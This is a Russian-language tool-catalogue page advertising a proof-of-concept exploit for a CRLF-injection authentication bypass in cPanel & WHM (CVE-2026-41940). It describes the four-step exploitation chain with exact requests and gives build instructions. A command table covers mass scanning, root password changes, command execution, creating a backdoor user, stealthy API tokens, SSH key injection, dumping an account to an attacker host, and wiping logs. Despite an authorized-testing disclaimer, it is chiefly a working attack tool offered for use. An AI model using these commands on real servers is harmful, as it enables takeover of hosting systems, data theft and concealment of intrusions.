Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41940-Exploit-PoC — Эксплойт PoC для CVE-2026-41940 — обход аутентификации cPanel & WHM через CRLF-инъекцию. Включает массовое сканирование, действия после эксплуатации и интерактивную оболочку для авторизованного тестирования. | Kitploit
Инструменты/GitHubGitHub/ishanoshada/cve-2026-41940-exploit-poc
Аутентификация и авторизацияСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubishanoshada/cve-2026-41940-exploit-poc

CVE-2026-41940-Exploit-PoC

Эксплойт PoC для CVE-2026-41940 — обход аутентификации cPanel & WHM через CRLF-инъекцию. Включает массовое сканирование, действия после эксплуатации и интерактивную оболочку для авторизованного тестирования.

РепозиторийСайт
21275 месяцев назадЕщё не проверено

CVE-2026-41940 Exploit PoC – Обход аутентификации cPanel & WHM

CVE-2026-41940 CVSS Go Version License

Автор инструмента: Ishan Oshada | GitHub

⚠️ ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ. Несанкционированное использование незаконно.

1


📋 Содержание

  • Обзор уязвимости
  • Цепочка эксплуатации
  • Возможности
  • Установка
  • Быстрый старт
  • Примеры использования (таблица)
  • Действия после эксплуатации
  • Команды интерактивной оболочки
  • Массовое сканирование с urls.txt
  • Примеры вывода
  • Справочник параметров
  • Затронутые версии
  • Сборка для всех платформ
  • FAQ и устранение неполадок
  • Отказ от ответственности
  • Автор

2

Обзор уязвимости

CVE-2026-41940 — это уязвимость CRLF-инъекции в cPanel & WHM (версии < 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5).

Функция saveSession() записывает данные сессии после применения filter_sessiondata(), но фильтр применяется слишком поздно. Внедряя CRLF-символы (\r\n) в заголовок Authorization: Basic, злоумышленник может отравить файл сессии на диске произвольными парами ключ-значение (например, hasroot=1, tfa_verified=1, user=root).

Когда отравленная сессия позже загружается, cPanel/WHM предоставляет полный root-доступ без какого-либо пароля.

Оценка CVSS: 10.0 (КРИТИЧЕСКАЯ)

  • Вектор атаки: Сеть
  • Сложность атаки: Низкая
  • Требуемые привилегии: Отсутствуют
  • Взаимодействие с пользователем: Отсутствует
  • Конфиденциальность: Высокая
  • Целостность: Высокая
  • Доступность: Высокая

Цепочка эксплуатации (4 этапа)

ЭтапДействиеОписание
1POST /login/?login_only=1Запрос pre-auth cookie сессии с неверными учётными данными
2GET / + CRLF-заголовок AuthorizationОтравление файла сессии значениями hasroot=1, user=root и т.д.
3GET /scripts2/listacctsПринудительная перезагрузка кэша сессии из отравленного файла (распространение)
4GET /cpsess<TOKEN>/json-api/versionПроверка root-доступа — успех = 200 + данные версии

Возможности

  • ✅ Одиночное и массовое сканирование (ввод из файла, конвейер stdin)
  • ✅ Многопоточное сканирование (управление параллелизмом до 100+ потоков)
  • ✅ Подробный режим (--verbose) — показывает полные HTTP-запросы/ответы
  • ✅ JSON-вывод (автосохранение при обнаружении уязвимой цели)
  • ✅ 10 действий после эксплуатации (см. таблицу ниже)
  • ✅ Кроссплатформенность (Windows, Linux, macOS)
  • ✅ Без внешних зависимостей (только стандартная библиотека Go)
  • ✅ Цветной вывод в терминале с чёткими рамками результатов
  • ✅ Постоянство сессии — механизм keep-alive
  • ✅ Интерактивная WHM-оболочка с историей команд

Установка

Предварительные требования

  • Go 1.20 или выше (Скачать)

Клонирование репозитория

git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC

Сборка исполняемого файла

Windows

go build -o cpanel_sniper.exe main.go

Linux / macOS

go build -o cpanel_sniper main.go
chmod +x cpanel_sniper

Запуск напрямую (без сборки)

go run main.go -u https://target.com:2087

Готовые бинарные файлы (самый быстрый способ)

Вместо сборки из исходников вы можете скачать последние стабильные исполняемые файлы прямо из репозитория. Они автоматически генерируются для каждого обновления:

ПлатформаРасположение
Windows (x64)/bin/windows_x64/cpanel_sniper.exe
Linux (x64)/bin/linux_x64/cpanel_sniper
Linux (ARM64)/bin/linux_arm64/cpanel_sniper
macOS (Intel)/bin/mac_intel/cpanel_sniper
macOS (M1/M2/M3)/bin/mac_m1_m2/cpanel_sniper

Примечание: При использовании Linux или macOS не забудьте предоставить права на выполнение после загрузки:


Быстрый старт

# Базовое сканирование
go run main.go -u https://target.com:2087

# Список всех cPanel-аккаунтов
go run main.go -u https://target.com:2087 -action list

# Интерактивная WHM-оболочка
go run main.go -u https://target.com:2087 -action shell

# Массовое сканирование с urls.txt
go run main.go -l urls.txt -t 20 -o results.json

Примеры использования (таблица)

#НазначениеКоманда
1Базовое сканирование одной целиgo run main.go -u https://target.com:2087
2Список всех cPanel-аккаунтовgo run main.go -u https://target.com:2087 -action list
3Смена root-пароляgo run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"
4Выполнение системной командыgo run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"
5Получение информации о сервереgo run main.go -u https://target.com:2087 -action info
6Создание пользователя-бэкдораgo run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"
7Создание API-токена (скрытно)go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken
8Внедрение SSH-ключаgo run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."
9Дамп и эксфильтрация аккаунтаgo run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload
10Очистка логов и заметание следовgo run main.go -u https://target.com:2087 -action wipe
11Интерактивная WHM-оболочкаgo run main.go -u https://target.com:2087 -action shell
12Массовое сканирование из файлаgo run main.go -l urls.txt -t 20 -o results.json
13Сохранение результатов в JSONgo run main.go -u https://target.com:2087 -o scan_results.json
14Включение подробной отладкиgo run main.go -u https://target.com:2087 --verbose
15Конвейер из других инструментовcat urls.txt | go run main.go -t 20
16Увеличение таймаутаgo run main.go -u https://target.com:2087 -timeout 30

Скачать инструмент